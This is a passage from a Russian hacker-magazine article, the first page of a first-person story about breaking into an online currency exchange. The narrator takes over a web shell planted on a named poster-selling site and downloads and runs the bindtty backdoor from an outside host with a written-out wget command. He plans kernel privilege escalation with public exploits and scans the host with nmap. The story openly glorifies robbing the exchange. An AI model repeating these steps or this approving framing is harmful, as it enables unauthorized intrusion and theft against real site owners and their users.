Захват exchange-центра

Sashiks (lubimovv@inbox.ru)

Хакер, номер #077, стр. 077-048-1

Как был взломан сетевой обменник

Доллары, евро... Миром правят деньги, и это факт. Все мы продаемся в той или иной степени, чтобы заработать хоть чуточку больше этих самых условных единиц. И от этого никуда не уйти — деньги нужны нам, чтобы существовать. Но зарабатывать бабло можно разными способами: можно честно впахивать в конторе с 9 до 5, можно открыть свой бизнес, а можно просто ограбить какой-нибудь электронный обменник и прожить остаток жизни на Ямайке. Ты говоришь, это сложно? Не смеши мои коленки!

[пролог]

В один из теплых весенних вечеров я сидел на своем любимом irc-канале и болтал о всякой ерунде. За окном было, казалось, настоящее лето: 15 градусов тепла после мартовских холодов вызывали бурю эмоций и прилив весенней эйфории. Даже остатки грязного снега на обочинах дорог не портили общего настроения. Мне хотелось заняться чем-то креативным, творческим – например, взломать какой-нибудь сайт :). Я думал об этом, и тут ко мне в приват постучался незнакомец. Чел хотел что-то у меня выяснить. Вопрос был банальный: чувак спросил, каким образом можно скомпилировать эксплоит. Я подробно объяснил, что в большинстве случаев собирать надо так: gcc exploit.c -o exploit и запускать, соответственно, ./exploit. Но у чела опять возникли проблемы :(. Я решил помочь и попросил дать линк на сервер, где, собственно, упражнялся мой подопечный. Оказалось, что этот товарищ залил php-шелл на сайт, торгующий постерами к новым зарубежным фильмам (www.e-posters.ru). Не дурно! Сайт выглядел очень солидно, однако не радовал обилием скриптов. Я, по привычке, принялся отыскивать уязвимые сценарии, модифицируя управляющие переменные, однако ничего путевого у меня не получалось. Однако вскоре я заметил форум phpBB и мне стало ясно, каким образом этот необразованный чухан залил на хост web-шелл.

Я перешел по ссылке на rst-шный шелл с правами вебсервера и подумал, что сейчас начнется самое интересное. И интуиция меня не подвела.

[интересная история]

Итак, чем я располагал? Ну, во-первых, я узнал, что машинка работает под линуксом с ядром ветки 2.4. Вывод — можно попробовать порутать машину с помощью паблик сплойтов для mremap(), do_brk() или ptrace(). Но сначала нужно было получить доступ к рабочему интерпретатору в системе. Для этих целей можно было залить на хост стандартный бэкдор на C или на Perl. Но все эти бэкдоры жутко неудобные — в них недоступны основные комбинации клавиш, да еще к тому же они очень часто "глотают" некоторые чары и виснут в самый ответственный момент :(. На роль бэкдора больше подходит псевдотерминал, который поддерживает большую часть стандартных функций. Я скачал bindtty (wget http://gst.void.ru/exp/bindtty -O /usr/tmp) и запустил бэкдора. Прителнетившись к порту bindtty (2163 по дефолту), я убедился в том, что все работает как часы.

На всякий пожарный я решил просканировать хост с пошью nmap (http://insecure.org/nmap/). Оказалось, что на сервере крутятся только стандартные сервисы: ssh, почта, web — ничего лишнего. Ах да, на машине не был запущен файрвол (естественно, дурень, как бы ты тогда к бэкдору приконектился — прим. здравого рассудка). В директории /usr/tmp я увидел странные архивчики типа root.tgz, boot.tar.tgz, lame.tgz. Очень интересно! На что это похоже? Правильно — на заархивированные директории /boot и /root. Не став раздумывать, как они там оказались, я скачал себе все эти файлы на винчестер в надежде найти хоть какую-нибудь полезную инфу. Но к сожалению в архивах ничего полезного не оказалось :(. В них просто находилась куча эксплойтов против различных демонов (в основном паблик эксплойты против ftpd и некоторых других популярных сервисов, хотя все из них устарели и давно утратили свою актуальность).

Содержание  Вперед на стр. 077-048-2
ttfb: 3.3800601959229 ms